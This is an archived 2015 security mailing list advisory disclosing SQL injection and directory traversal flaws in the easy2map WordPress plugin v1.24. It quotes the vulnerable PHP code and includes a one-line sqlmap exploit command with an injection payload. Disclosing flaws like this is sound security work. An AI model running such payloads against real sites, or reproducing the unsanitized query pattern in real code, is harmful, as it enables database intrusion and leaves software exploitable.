lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-id: <F1F1AB50-CF3F-4509-AEC1-07E9F8F42DAC@me.com>
Date: Thu, 02 Jul 2015 18:26:01 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: Open Source Security <oss-security@...ts.openwall.com>
Cc: fulldisclosure@...lists.org
Subject: [FD] SQL Injection in easy2map wordpress plugin v1.24

Title: SQL Injection in easy2map wordpress plugin v1.24
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-08
Download Site: https://wordpress.org/plugins/easy2map
Vendor: Steven Ellis
Vendor Notified: 2015-06-08, fixed in v1.25
Vendor Contact: https://profiles.wordpress.org/stevenellis/
Advisory: http://www.vapid.dhs.org/advisory.php?v=131
Description: The easiest tool available for creating custom & great-looking Google Maps. Add multiple pins and customize maps with drag-and-drop simplicity.
Vulnerability:
The following lines in Function.php use sprintf() to format queries being sent to the database, this doesn't provide proper sanitization of user input or
properly parameterize the query to the database.

 90         $wpdb->query(sprintf("UPDATE $mapsTable
 91         SET PolyLines = '%s'
 92         WHERE ID = '%s';", $PolyLines, $mapID));

.
.
.
163             $wpdb->query(sprintf("
164                 UPDATE $mapsTable
165                 SET TemplateID = '%s',
166                     MapName = '%s',
167                     Settings = '%s',
168                     LastInvoked = CURRENT_TIMESTAMP,
169                     CSSValues = '%s',
170                     CSSValuesList = '%s',
171                     CSSValuesHeading = '%s',
172                     MapHTML = '%s',
173                     IsActive = 1,
174                     ThemeID = '%s'
175                 WHERE ID = %s;",
176                     $Items['mapTemplateName'],
177                     $Items['mapName'],
178                     urldecode($Items['mapSettingsXML']),
179                     urldecode($Items["mapCSSXML"]),
180                     urldecode($Items["listCSSXML"]),
181                     urldecode($Items["headingCSSXML"]),
182                     urldecode($Items["mapHTML"]),
183                     $Items['mapThemeName'],
184                     $mapID));
185         } else {
186 
187             //this is a map insert
188             if (!$wpdb->query(sprintf("
189             INSERT INTO $mapsTable(
190                 TemplateID,
191                 MapName,
192                 DefaultPinImage,
193                 Settings,
194                 LastInvoked,
195                 PolyLines,
196                 CSSValues,
197                 CSSValuesList,
198                 CSSValuesHeading,
199                 MapHTML,
200                 IsActive,
201                 ThemeID
202             ) VALUES ('%s', '%s', '%s', '%s', 
203                     CURRENT_TIMESTAMP, '%s', '%s', '%s', '%s', '%s', 0, '%s');",
204                     $Items['mapTemplateName'],
205                     $Items['mapName'], str_replace('index.php', '', easy2map_get_plugin_url('/index.php')) .     "images/map_pins/pins/111.png",
206                     urldecode($Items['mapSettingsXML']), '',
207                     urldecode($Items["mapCSSXML"]),
208                     urldecode($Items["listCSSXML"]),
209                     urldecode($Items["headingCSSXML"]),
210                     urldecode($Items["mapHTML"]),
211                     $Items['mapThemeName']))) 
.
.
267         $wpdb->query(sprintf("
268             UPDATE $mapsTable
269             SET MapName = '%s',
270             LastInvoked = CURRENT_TIMESTAMP,
271             IsActive = 1
272             WHERE ID = %s;", $mapName, $mapID));

In MapPinImageSave.php, code isn’t sanitized when creating a directory allowing ../ to create files outside of intended directory:

4 $imagesDirectory = WP_CONTENT_DIR . "/uploads/easy2map/images/map_pins/uploaded/" . $_GET["map_id"] . "/";
.
.
11 if (is_uploaded_file($_FILES["pinicon"]['tmp_name'])) {
12 
13     if (!file_exists($imagesDirectory)) {
14         mkdir($imagesDirectory);
15     }

CVEID: 2015-4614 (SQLi) 2015-4616 (../ bug)
OSVDB:
Exploit Code:
	• $ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie=‘COOKIE HERE’ --level=5 --risk=3

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ